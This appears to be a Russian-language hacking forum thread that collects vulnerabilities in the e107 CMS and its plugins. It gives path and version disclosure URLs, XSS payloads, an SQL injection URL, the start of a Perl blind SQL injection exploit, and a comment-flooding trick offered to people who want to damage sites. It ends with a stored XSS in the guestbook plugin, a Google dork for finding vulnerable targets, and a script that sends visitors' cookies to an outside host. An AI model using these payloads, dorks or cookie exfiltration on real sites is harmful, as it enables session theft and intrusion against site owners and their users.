![]() |
Full path disclosure --last upd
Код:
/online.php |
Version disclosure --last upd
Код:
/e107_admin/credits.php |
xss в плагине форума, в версии v.0.7.15
заголовок темы не фильтруется Код:
><script>alert(1)</script>< |
e107 Plugin userjournals_menu
Код:
################################################################### |
Обнаружил интересную вещь.
Движок e107 так-же неадекватно реагирует на флуд в новостях, если хорошенько зафлудить максимальным количеством символов в 2-3 сообщения, то коментарии к новости вообще никакие не будут отображаться. Любителям сделать гадость на сайте это подойдёт как нельзя кстати. Решение: ограничить количество символов в сообщениях, или не допускать большое кол-во одинаковых символов\слов в сообщении. |
e107 <= 0.7.15 (extended_user_fields) Blind SQL Injection Exploit
Код:
#!/usr/bin/env perl |
ZoGo-Shop e107 plugin
Vuln File: product_details.php Vuln Code: Код:
e107_plugins/zogo-shop/product_details.phpКод:
http://localhost/[path]/e107_plugins/zogo-shop/product_details.php?product=[SQL] |
Есть такая штука...
В файле e107_admin/auth.php PHP код:
Можно дописать после нее echo $authname, и мы увидим резалт. Но у меня на локалхосте так и не получилось что-либо сделать. Выходит какаето ерунда... Запрос вроде есть мускл возвр хендл, но когда идет проверка на кол-во строк возвр 0 Хоть убей не понимаю в чем дело... |
Цитата:
Смотрим e107_handlers/e_parse_class.php Дабы избежать того, на что наткнулся ты, я поставлю /*1*/ в те участки кода, которые браузер воспринимает не так как они есть на самом деле: Код:
function toDB($data, $nostrip = false, $no_encode = false, $mod = false)' -> &#/*1*/039; Что делает браузер? отображает &#/*1*/039; как привычную кавычку. Что делаешь ты? дописываешь в код echo($authname); И видишь, то, что хочешь увидеть - кавычку, а вот если заглянуть в сорец странички (html (Вид - Исходный код страницы)), то можно увидеть что кавычки там нету, а есть &#/*1*/039; |
Уязвимость существует из-за недостаточной обработки входных данных параметра "email" в POST запросе сценария guestbook.php.
Уязвимое поле "E-mail". Сформированные Post data заголовок: Код:
POSTDATA=name=E107 CMS (e107_plugins/guestbook) stored XSS by ettee(itdefence.ru)&email='><script>alert('xss')</script>Google dork: inurl:/e107_plugins/guestbook/guestbook.php Cookie: '><script>img = new Image(); img.src = "http://someshit.net/image/s.gif?"+document.cookie;</script> |
| Время: 10:31 |